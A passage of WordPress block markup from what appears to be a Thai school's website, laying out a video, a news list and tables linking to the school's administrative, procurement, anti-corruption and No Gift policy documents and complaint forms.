{\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  ตรวจสอบผลการเรียน<br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 